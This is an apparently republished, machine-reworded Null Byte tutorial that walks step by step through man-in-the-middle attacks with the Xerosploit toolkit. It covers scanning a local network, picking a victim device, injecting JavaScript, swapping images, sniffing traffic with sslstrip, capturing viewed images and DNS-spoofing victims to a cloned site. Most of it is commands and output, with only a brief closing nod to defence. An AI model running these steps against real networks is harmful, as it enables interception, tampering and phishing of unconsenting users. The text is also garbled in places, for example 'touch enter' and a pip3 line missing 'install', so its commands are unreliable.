قالب وردپرس درنا توس
Home / Tips and Tricks / Performing Advanced Man-in-the-Middle Attacks with Xerosploit « Null Byte :: WonderHowTo

Performing Advanced Man-in-the-Middle Attacks with Xerosploit « Null Byte :: WonderHowTo



A man-in-the-middle attack, or MitM attack, is when a hacker penetrates a network and forces all nearby devices to connect directly to their machine. This allows them to spy on traffic and even tweak certain things. Bettercap is a tool that can be used for these kinds of MitM attacks, but Xerosploit can automate high-level features that would normally require more configuration work in Bettercap.

Xerosploit works on top of a few other tools, namely Bettercap and Nmap, and automates them to the extent that you can reach these higher-level concepts in just a few commands.

However, Xerosploit can be hit or miss, so don’t be surprised if some web pages can̵

7;t be spoofed because the target uses HTTPS or routes traffic through a VPN. Since 73% of all websites use HTTPS, you will only have success manipulating web pages on the remaining 27%, and only if no VPN is used.

Some sites are still accessible over HTTP because they don’t redirect insecure requests to HTTPS, and some don’t even have secure versions yet. Here’s a small sample, but there are many more in that 27%:

What is needed?

We’ve only tested Xerosploit on Ubuntu and Kali Linux, but it may work on macOS as well. However, you can only choose between “Ubuntu / Kali Linux / Others” and “Parrot OS” during the installation process.

You also need the latest version of Python installed on your computer.

Step 1: Install Xerosploit

First install Xerosploit from GitHub using git clone.

~$ git clone https://github.com/LionSec/xerosploit

Cloning into 'xerosploit' ...
remote: Enumerating objects: 306, done.
remote: Total 306 (delta 0), reused 0 (delta 0), pack-reused 306
Receiving objects: 100% (306/306), 793.28 KiB | 2.38 MiB/s, done.
Resolving deltas: 100% (68/68), done.

Then go to the directory (CD) and start the installer with Python. It will ask you to select your operating system; if you use Kali Linux, choose 1 and touch enter.

~$ cd xerosploit && sudo python install.py

┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                     Xerosploit Installer                     █
█                                                              █
└══════════════════════════════════════════════════════════════┘

[++] Please choose your operating system.

1) Ubuntu / Kali Linux / Others
2) Parrot OS

>>> 1

[++] Insatlling Xerosploit ...
Get:1 http://kali.download/kali kali-rolling inRelease [30.5 kB]
Get:2 http://kali.download/kali kali-rolling/main Sources [14.0 kB]

...

Xerosploit has been successfully installed. Execute 'xerosploit' in your termninal.

Step 2: Install the Dependencies

For Xerosploit to do its job properly, you need all the tools it built its service on, including Nmap, hping3, build-essential, ruby-dev, libpcap-dev, and libgmp3-dev. If you use Kali, you probably already have all of these.

~/xerosploit$ sudo apt install nmap hping3 build-essential ruby-dev libpcap-dev libgmp3-dev

Reading package lists ... Done
Building dependency try ... Done
Reading state information ... Done
build-essential is already the newest version (12.9).
build-essential set to manually installed.
hping3 is already the newest version (3.a2.ds2-10).
hping3 set to manually installed.
nmap is already the newest version (7.91+dfsg1-1kali1).
nmap set to manually installed.
ruby-dev is already the newest version (1:2.7+2).
ruby-dev set to manually installed.
libpcap-dev is already the newest version (1.9.1-r0).
libpcap-dev set to manually installed.
libgmp3-dev is already the newest version (2:6.0.0+dfsg-6).
libgmp3-dev set to manually installed.

And use Python to install tables and terminal tables, which allow Xerosploit to display information to you in an easy-to-read way. You probably already have these tools.

~/xerosploit$ sudo pip3 tabulate terminaltables

Requirement already satisfied: tabulate in /usr/lib/python3/dist-packages (0.8.7)
Requirement already satisfied: terminaltables in /usr/lib/python3/dist-packages (3.1.0)

Step 3: View Xerosploit’s Commands

Start Xerosploit with the xerosploit order. It immediately shows you information about your network configuration.

~/xerosploit$ sudo xerosploit

        ▄  ▄███▄   █▄▄▄▄ ████▄    ▄▄▄▄▄   █ ▄▄  █     ████▄ ▄█    ▄▄▄▄▀
    ▀▄   █ █▀   ▀  █  ▄▀ █   █   █     ▀▄ █   █ █     █   █ ██ ▀▀▀ █
      █ ▀  ██▄▄    █▀▀▌  █   █ ▄  ▀▀▀▀▄   █▀▀▀  █     █   █ ██     █
     ▄ █   █▄   ▄▀ █  █  ▀████  ▀▄▄▄▄▀    █     ███▄  ▀████ ▐█    █
    █   ▀▄ ▀███▀     █                     █        ▀        ▐   ▀
     ▀              ▀                       ▀

[+]═══════════[ Author : @LionSec1 _-|/-_ Website: www.neodrix.com ]═══════════[+]

                      [ Powered by Bettercap and Nmap ]

┌═════════════════════════════════════════════════════════════════════════════┐
█                                                                             █
█                         Your Network Configuration                          █
█                                                                             █
└═════════════════════════════════════════════════════════════════════════════┘

╒════════════════════════════════════════════════════════════════════════════╤═══════════════════╤═════════════╤═════════╤═════════════╕
│                                 IP Address                                 │    MAC Address    │   Gateway   │  Iface  │  Hostname   │
╞════════════════════════════════════════════════════════════════════════════╪═══════════════════╪═════════════╪═════════╪═════════════╡
├────────────────────────────────────────────────────────────────────────────┼───────────────────┼─────────────┼─────────┼─────────────┤
│ 192.168.8.172 fd0b:ed07:cb03:10::3fa fd0b:ed07:cb03:10:dcf1:e71a:2dc3:299f │ 28:D2:44:23:54:2B │ 192.168.8.1 │  eth0   │ Macbook-Pro │
╘════════════════════════════════════════════════════════════════════════════╧═══════════════════╧═════════════╧═════════╧═════════════╛

╔═════════════╦════════════════════════════════════════════════════════════════════╗
║             ║ Xerosploit is a penetration testing toolkit whose goal is to       ║
║ Information ║ perform man in the middle attacks for testing purposes.            ║
║             ║ It brings various modules that allow to realise efficient attacks. ║
║             ║ This tool is Powered by Bettercap and Nmap.                        ║
╚═════════════╩════════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮

Type help out to see all available commands in Xerosploit.

Xero ➮ help

╔══════════╦════════════════════════════════════════════════════════════════╗
║          ║                                                                ║
║          ║ scan : Map your network.                                       ║
║          ║                                                                ║
║          ║ iface : Manually set your network interface.                   ║
║ COMMANDS ║                                                                ║
║          ║ gateway : Manually set your gateway.                           ║
║          ║                                                                ║
║          ║ start : Skip scan and directly set your target IP address.     ║
║          ║                                                                ║
║          ║ rmlog : Delete all xerosploit logs.                            ║
║          ║                                                                ║
║          ║ help : Display this help message.                              ║
║          ║                                                                ║
║          ║ exit : Close Xerosploit.                                       ║
║          ║                                                                ║
╚══════════╩════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮

Step 4: Run a scan to identify targets

First we will do some reconnaissance to identify a target by the scan command, which runs on top of Nmap.

Xero ➮ scan

[++} Mapping your network ...

[+]═══════════[ Devices found on your network ]═══════════[+]

╔═══════════════╦═══════════════════╦═══════════════════════════════╗
║ IP Address    ║ Mac Address       ║ Manufacturer                  ║
║═══════════════║═══════════════════║═══════════════════════════════║
║ 192.168.8.1   ║ 94:83:C4:00:EB:C5 ║ (Unknown)                     ║
║ 192.168.8.215 ║ B8:70:F4:AD:44:C8 ║ (Compal Information(kunshan)) ║
║ 192.168.8.172 ║ 28:D2:44:12:23:6B ║ (This device)                 ║
╚═══════════════╩═══════════════════╩═══════════════════════════════╝

[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.

Xero ➮

You should see a list of returned IP addresses and if all went well, one of those IP addresses should be the one you want to target. So type the IP address of the device you want to target. For me it is the “kunshan” device.

Xero ➮ 192.168.8.215

[++] 192.168.8.215 ha been targeted.

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮

Now it will ask you which module you want to run against the target. If you don’t know the module you want, type help out to see a full list.

Xero»modules ➮ help

╔═════════╦════════════════════════════════════════════════════════════════════╗
║         ║                                                                    ║
║         ║ pscan      : Port Scanner                                          ║
║         ║                                                                    ║
║         ║ dos        : DoS Attack                                            ║
║         ║                                                                    ║
║         ║ ping       : Ping Request                                          ║
║         ║                                                                    ║
║         ║ injecthtml : Inject Html code                                      ║
║         ║                                                                    ║
║         ║ injectjs   : Inject Javascript code                                ║
║         ║                                                                    ║
║         ║ rdownload  : Replace files being downloaded                        ║
║         ║                                                                    ║
║         ║ sniff      : Capturing information inside network packets          ║
║ MODULES ║                                                                    ║
║         ║ dspoof     : Redirect all the http traffic to the specified one IP ║
║         ║                                                                    ║
║         ║ yplay      : Play background sound in target browser               ║
║         ║                                                                    ║
║         ║ replace    : Replace all web pages images with your own one        ║
║         ║                                                                    ║
║         ║ driftnet   : View all images requested by your targets             ║
║         ║                                                                    ║
║         ║ move       : Shaking Web Browser content                           ║
║         ║                                                                    ║
║         ║ deface     : Overwrite all web pages with your HTML code           ║
║         ║                                                                    ║
╚═════════╩════════════════════════════════════════════════════════════════════╝

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮

Step 5: Shake the target’s web browser

Of all the modules, the simplest to run is: Action, which will shake the web browser on the target computer. This helps verify that we have access to the target, or at least that we can manipulate their connection.

Xero»modules ➮ move

┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                           Shakescreen                        █
█                                                              █
█                   Shaking Web Browser content                █
└══════════════════════════════════════════════════════════════┘

[+] Enter 'run' to execute the 'move' command.

Xero»modules»shakescreen ➮

To start the Shakescreen effect, use run, which starts injecting JavaScript code into the browser when the target visits a website. But remember that it only works on web pages that use HTTP and not HTTPS.

Xero»modules»shakescreen ➮ run

[++] Injecting shakescreen.js  ...

[++] Press 'Ctrl + C' to stop.

So as soon as they open an HTTP webpage, the page should start to vibrate uncontrollably. At first, the target might think there was something wrong with their display until they noticed that the browser window itself and everything behind it doesn’t vibrate. Then they might think their internet is having problems.

This will continue to happen on every HTTP webpage they visit until you stop the attack with Control-C in the terminal.

stop
^C
Stopping MITM attack  ...

[+] Enter 'run' to execute the 'move' command.

Xero»modules»shakescreen ➮

Step 6: Replace all images in the target browser

Now let’s test another module. To return to the module selection screen, type back and enter.

Xero»modules»shakescreen ➮ back

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮

Xerosploit has a nice attack tool called to replace which allows us to swap all images loaded on an HTTP based web page with any image we want.

Xero»modules ➮ replace

┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                          Image Replace                       █
█                                                              █
█        Replace all web pages images with your own one        █
└══════════════════════════════════════════════════════════════┘

[+] Enter 'run' to execute the 'replace' command.

Xero»modules»replace ➮

To start the Replace Image tool, type run, and it will immediately prompt you to add the path of the image.

Xero»modules»replace ➮ run

[+] Insert your image path. (e.g. /home/capitansalami/pictures/fun.png)

Xero»modules»replace ➮

Find an image on your computer, then type the path or drag the image into the terminal window to autofill it. Touch enter to start the attack.

Xero»modules»replace ➮ /root/Desktop/Bolton/index_files/JBolton_Walrus.jpg

[++] All images will be replaced by /root/Desktop/Bolton/index_files/JBolton_Walrus.jpg

[++] Press 'Ctrl + C' to stop .

Whenever an HTTP-based web page loads in the target browser, all the images are replaced with the one image we chose. It doesn’t always work 100%, so a few images may slip by unchanged, and it can be a little slow depending on the connection speed, but overall it works pretty well.

This will continue to happen on every HTTP page until you stop the attack.

^C
Stopping MITM attack  ...

[+] Enter 'run' to execute the 'replace' command.

Xero»modules»replace ➮

Step 7: Capture data over the network

Let’s try another module. To return to the module selection screen, type back and enter.

Xero»modules»replace ➮ back

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮

With the sniff module, we can capture some general data through the network.

Xero»modules ➮ sniff

┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                           Sniffing                           █
█                                                              █
█      Capturing any data passed over your local network       █
└══════════════════════════════════════════════════════════════┘

[+] Please type 'run' to execute the 'sniff' command.

Xero»modules»sniff ➮

Once the Sniffing tool is selected, type run start sniffing. It will then ask you if you want to load sslstrip, which will try to downgrade the traffic so we can pick up interesting information that we might otherwise lose.

Xero»modules»sniff ➮ run

[+] Do you want to load sslstrip ? (y/n).

Xero»modules»sniff ➮ y

[++] All logs are saved on : /opt/xerosploit/xerosniff

[++] Sniffing on 192.168.8.215

[++] sslstrip : ON

[++] Press 'Ctrl + C' to stop .

A new window should open to list all packets that are intercepted and stored on your computer. In the window you can easily see which websites the target visits and which data is requested and sent.

Once you’re done sniffing packs, you can stop the attack with: Control-C on your keyboard. Then you will be asked whether you want to save the logs or not. Use Y for yes, No for no.

^C
Stopping MITM attack  ...

[+] Do you want to save logs ? (y/n).

Xero»modules»sniff ➮ n

[++] Logs have been removed.

[+] Please type 'run' to execute the 'sniff' command.

Xero»modules»sniff ➮

Step 8: View all images loaded in the target browser

Let’s try another module. To return to the module selection screen, type back and enter.

Xero»modules»sniff ➮ back

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮

Enter driftnet, a tool that allows you to view each individual image requested by the target’s browser, and then run it. It will then start logging all images seen on HTTP web pages from the target browser and save them in the /opt/xerosploit/xedriftnet directory.

Xero»modules ➮ driftnet

┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                            Driftnet                          █
█                                                              █
█          View all images requested by your target            █
└══════════════════════════════════════════════════════════════┘

[+] Enter 'run' to execute the 'driftnet' command.

Xero»modules»driftnet ➮ run

[++] Capturing requested images on 192.168.8.215  ...

[++] All captured images will be temporarily saved in /opt/xerosploit/xedriftnet

[++] Press 'Ctrl + C' to stop.

When you’re ready to check out the treasure chest of goodies, open a separate terminal window and navigate to the “xedriftnet” folder. You can list (ls) its contents to see what has been captured.

~$ cd /opt/xerosploit/xedriftnet

~/opt/xerosploit/xedriftnet$ ls

Step 9: Run the DNS Spoofing Module on a Target

If you want to redirect traffic to a specific IP address, dspoof module can help. But first you want to create a fake website to redirect others on the network to. So visit a website you want to copy, save the HTML file and rename it “index.html”.

Then open a separate terminal window and navigate to the same folder as the index.html file. Run the following command to create a local version of the web page, using the YOUR IP share to your machine’s IP address.

~$ sudo python3 -m http.server --bind YOUR_IP 80

Then return to the terminal window with Xerosploit and enter the dspoof order. But first go back to the module selection screen. Open and then run the DNS spoofing tool.

When prompted, enter your IP address as the address to which traffic should be redirected. All web pages that load will be the page you cloned!

Xero»modules»sniff ➮ back

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮ dspoof

┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                         DNS spoofing                         █
█                                                              █
█   Supply false DNS information to all target browsed hosts   █
█     Redirect all the http traffic to the specified one IP    █
└══════════════════════════════════════════════════════════════┘

[+] Please type 'run' to execute the 'dspoof' command.

Xero»modules»dspoof ➮ run

[+] Enter the IP address where you want to redirect the traffic.

[++] Redirecting all the traffic to your IP address.

[++] Press 'Ctrl + C' to stop .

Step 10: Try out the other modules

The other modules you can try are the following, some of which are quite fun to try.

  • yplay: Play a YouTube video in the background of browsers.
  • injectjs: Inject JavaScript into websites loaded by others on the network.
  • injecthtml: Inject HTML into websites loaded on the network instead.
  • From: Deny Internet access to that IP address.
  • pscan: Perform a port scan.
  • ping: Ping a device.
  • rdownload: Replace files being downloaded with your own files.
  • to disfigure: Swap any web page with your own HTML.

Xerosploit is a vivid example of why you should be careful connecting to an unknown network. While a VPN can protect you in most cases, there are still ways an attacker can manipulate your traffic. So be sure to take as many precautions as possible, such as using a VPN, if you are unsure of the security of the network you will be connecting to.

Do you want to earn money as a white hat hacker? Jump-start your hacking career with our 2020 Premium Ethical Hacking Certification Training Bundle from the new Null Byte Shop and get over 60 hours of training from cybersecurity professionals.

Buy now (90% discount) >

Other valuable deals to check out:

Cover image and GIFs by Retia/Null Byte

Source link